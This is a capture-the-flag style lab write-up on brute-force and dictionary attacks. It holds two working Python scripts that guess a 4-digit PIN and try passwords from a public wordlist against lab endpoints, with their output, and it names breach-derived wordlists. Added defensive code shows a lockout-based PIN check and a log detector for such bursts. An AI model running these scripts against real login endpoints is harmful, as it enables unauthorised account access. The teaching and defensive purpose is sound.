Brute Force Attacks

Cracking the PIN
The instance application generates a random 4-digit PIN and exposes an endpoint (/pin) that accepts a PIN as a query parameter. If the provided PIN matches the generated one, the application responds with a success message and a flag. Otherwise, it returns an error message.
We will use this simple demonstration Python script to brute-force the /pin endpoint on the API. Copy and paste the Python script below as pin-solver.py onto your machine. You only need to modify the IP and port variables to match your target system information.
import requests

ip = "127.0.0.1"  # Change this to your instance IP address
port = 1234       # Change this to your instance port number

# Try every possible 4-digit PIN (from 0000 to 9999)
for pin in range(10000):
    formatted_pin = f"{pin:04d}"  # Convert the number to a 4-digit string (e.g., 7 becomes "0007")
    print(f"Attempted PIN: {formatted_pin}")

    # Send the request to the server
    response = requests.get(f"http://{ip}:{port}/pin?pin={formatted_pin}")

    # Check if the server responds with success and the flag is found
    if response.ok and 'flag' in response.json():  # .ok means status code is 200 (success)
        print(f"Correct PIN found: {formatted_pin}")
        print(f"Flag: {response.json()['flag']}")
        break
The Python script systematically iterates all possible 4-digit PINs (0000 to 9999) and sends GET requests to the Flask endpoint with each PIN. It checks the response status code and content to identify the correct PIN and capture the associated flag.
eldeim@htb[/htb]$ python pin-solver.py
...
Attempted PIN: 4039
Attempted PIN: 4040
Attempted PIN: 4041
Attempted PIN: 4042
Attempted PIN: 4043
Attempted PIN: 4044
Attempted PIN: 4045
Attempted PIN: 4046
Attempted PIN: 4047
Attempted PIN: 4048
Attempted PIN: 4049
Attempted PIN: 4050
Attempted PIN: 4051
Attempted PIN: 4052
Correct PIN found: 4053
Flag: HTB{...}
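The sweep above succeeds because the endpoint answers every guess at the same speed and never stops accepting them. As an added example (not the lab's own code), here is a hardened model of the same check with a per-client failure limit and a constant-time comparison; PinVerifier, MAX_ATTEMPTS and LOCKOUT_SECONDS are assumed names and the flag is a placeholder. It replays the page's 0000-9999 sweep to show how few guesses actually get evaluated once a lockout exists.

```python
import hmac
import time
from collections import defaultdict

# Constructed, hardened model of the lab's /pin check (not the lab's own code).
# MAX_ATTEMPTS and LOCKOUT_SECONDS are assumed policy values.
MAX_ATTEMPTS = 5        # failed guesses allowed before a client is locked out
LOCKOUT_SECONDS = 300   # how long the lockout lasts, in seconds


class PinVerifier:
    def __init__(self, secret_pin, clock=time.monotonic):
        self._secret = secret_pin.encode()
        self._clock = clock                  # injectable for deterministic tests
        self._failures = defaultdict(int)    # client -> consecutive failures
        self._locked_until = {}              # client -> time the lockout ends

    def check(self, client, pin):
        now = self._clock()
        if self._locked_until.get(client, 0) > now:
            return {"status": 429, "error": "too many attempts"}
        # Constant-time comparison: response time must not depend on how many
        # leading digits of the guess match the secret.
        if hmac.compare_digest(self._secret, pin.encode()):
            self._failures.pop(client, None)
            return {"status": 200, "flag": "FLAG_PLACEHOLDER"}
        self._failures[client] += 1
        if self._failures[client] >= MAX_ATTEMPTS:
            self._locked_until[client] = now + LOCKOUT_SECONDS
            self._failures.pop(client, None)
        return {"status": 401, "error": "invalid PIN"}


def simulate_sweep(verifier, client):
    """Replay the page's 0000-9999 sweep from one client and count how many
    guesses the verifier actually evaluated versus refused with 429."""
    evaluated = refused = 0
    for pin in range(10000):
        r = verifier.check(client, f"{pin:04d}")
        if r["status"] == 429:
            refused += 1
            continue
        evaluated += 1
        if r["status"] == 200:
            return {"found": True, "evaluated": evaluated, "refused": refused}
    return {"found": False, "evaluated": evaluated, "refused": refused}


if __name__ == "__main__":
    print(simulate_sweep(PinVerifier("4053"), client="10.0.0.5"))
```

The counter is keyed per client here; production systems typically keep a per-account (for a shared secret, global) failure counter alongside it.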
PoCs - Questions
After successfully brute-forcing the PIN, what is the full flag the script returns?
I use the script to get the PIN and modify the IP address and port -->

And then execute the script, and WAIT-->

Dictionary Attacks
Brute Force vs. Dictionary Attack
Brute Force: A pure brute-force attack systematically tests every possible combination of characters within a predetermined set and length. While this approach guarantees eventual success given enough time, it can be extremely time-consuming, particularly against longer or complex passwords.
Dictionary Attack: In stark contrast, a dictionary attack employs a pre-compiled list of words and phrases, dramatically reducing the search space. This targeted methodology results in a far more efficient and rapid attack, especially when the target password is suspected to be a common word or phrase.
Here is a table of some of the more useful wordlists for login brute-forcing:
rockyou.txt: A popular password wordlist containing millions of passwords leaked from the RockYou breach. Commonly used for password brute force attacks.
top-usernames-shortlist.txt: A concise list of the most common usernames. Suitable for quick brute force username attempts.
xato-net-10-million-usernames.txt: A more extensive list of 10 million usernames. Used for thorough username brute forcing.
2023-200_most_used_passwords.txt: A list of the 200 most commonly used passwords as of 2023. Effective for targeting commonly reused passwords.
Default-Credentials/default-passwords.txt: A list of default usernames and passwords commonly used in routers, software, and other devices. Ideal for trying default credentials.
Throwing a dictionary at the problem
Copy and paste the Python script below as dictionary-solver.py onto your machine. You only need to modify the IP and port variables to match your target system information.
import requests

ip = "127.0.0.1"  # Change this to your instance IP address
port = 1234       # Change this to your instance port number

# Download a list of common passwords from the web and split it into lines
passwords = requests.get("https://raw.githubusercontent.com/danielmiessler/SecLists/refs/heads/master/Passwords/Common-Credentials/500-worst-passwords.txt").text.splitlines()

# Try each password from the list
for password in passwords:
    print(f"Attempted password: {password}")

    # Send a POST request to the server with the password
    response = requests.post(f"http://{ip}:{port}/dictionary", data={'password': password})

    # Check if the server responds with success and contains the 'flag'
    if response.ok and 'flag' in response.json():
        print(f"Correct password found: {password}")
        print(f"Flag: {response.json()['flag']}")
        break
eldeim@htb[/htb]$ python3 dictionary-solver.py
...
Attempted password: turtle
Attempted password: tiffany
Attempted password: golf
Attempted password: bear
Attempted password: tiger
Correct password found: ...
Flag: HTB{...}
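Both scripts leave the same trace in the web server's access log: a burst of failed requests to one endpoint from one source within seconds. As an added example (not from the module), this detection pass parses a constructed combined-format log excerpt and raises one alert per (client, endpoint) pair once it sees three 401 responses within a minute; the log lines, thresholds and function name are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed access-log excerpt (combined log format); the addresses,
# timestamps and request counts are made up for this example.
SAMPLE_LOG = """\
10.0.0.5 - - [12/May/2024:14:03:01 +0000] "POST /dictionary HTTP/1.1" 401 44
10.0.0.5 - - [12/May/2024:14:03:01 +0000] "POST /dictionary HTTP/1.1" 401 44
10.0.0.5 - - [12/May/2024:14:03:02 +0000] "GET /pin?pin=0000 HTTP/1.1" 401 40
10.0.0.5 - - [12/May/2024:14:03:02 +0000] "GET /pin?pin=0001 HTTP/1.1" 401 40
10.0.0.5 - - [12/May/2024:14:03:03 +0000] "POST /dictionary HTTP/1.1" 401 44
10.0.0.9 - - [12/May/2024:14:03:05 +0000] "POST /dictionary HTTP/1.1" 401 44
10.0.0.9 - - [12/May/2024:14:05:40 +0000] "POST /dictionary HTTP/1.1" 200 61
not a log line
"""

LOG_RE = re.compile(
    r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \d+'
)


def detect_bruteforce(log_text, threshold=3, window_s=60):
    """Flag a (client, endpoint) pair once it accumulates `threshold` failed
    (HTTP 401) requests within `window_s` seconds; one alert per pair."""
    failures = defaultdict(list)   # (ip, path) -> timestamps of recent 401s
    alerts, alerted = [], set()
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue               # ignore lines that are not access-log entries
        ip, ts, _method, target, status = m.groups()
        if status != "401":
            continue
        when = datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z")
        key = (ip, target.split("?", 1)[0])   # group by endpoint, not by query
        recent = [t for t in failures[key] if (when - t).total_seconds() <= window_s]
        recent.append(when)
        failures[key] = recent
        if len(recent) >= threshold and key not in alerted:
            alerted.add(key)
            alerts.append({"ip": ip, "path": key[1], "failures": len(recent),
                           "first": recent[0].isoformat(), "last": when.isoformat()})
    return alerts


if __name__ == "__main__":
    for alert in detect_bruteforce(SAMPLE_LOG):
        print(alert)
```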
PoCs - Questions
After successfully brute-forcing the target using the script, what is the full flag the script returns?
First modify the script -->

Then execute -->
